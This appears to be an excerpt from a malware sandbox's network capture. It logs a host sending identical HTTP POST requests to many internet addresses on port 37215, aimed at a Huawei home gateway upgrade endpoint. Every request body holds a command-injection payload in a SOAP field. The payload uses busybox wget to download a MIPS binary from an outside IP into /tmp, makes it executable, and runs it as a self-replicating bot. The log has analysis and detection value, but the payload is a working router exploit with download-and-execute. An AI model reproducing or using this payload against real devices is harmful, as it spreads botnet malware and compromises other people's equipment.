                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  912192.168.2.133394241.142.131.14737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.391572952 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  913192.168.2.1356240157.72.156.23337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.391609907 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  914192.168.2.134057641.112.233.4437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.391619921 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  915192.168.2.1336988157.43.154.10537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.391625881 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  916192.168.2.1357706157.168.200.17037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.391652107 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  917192.168.2.1343086157.8.234.13637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.391657114 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  918192.168.2.1356944197.40.223.4337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.393841982 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  919192.168.2.1359438157.51.62.12137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.393883944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  920192.168.2.1333282155.216.139.11537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.393893003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  921192.168.2.134218820.24.64.6637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.393915892 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 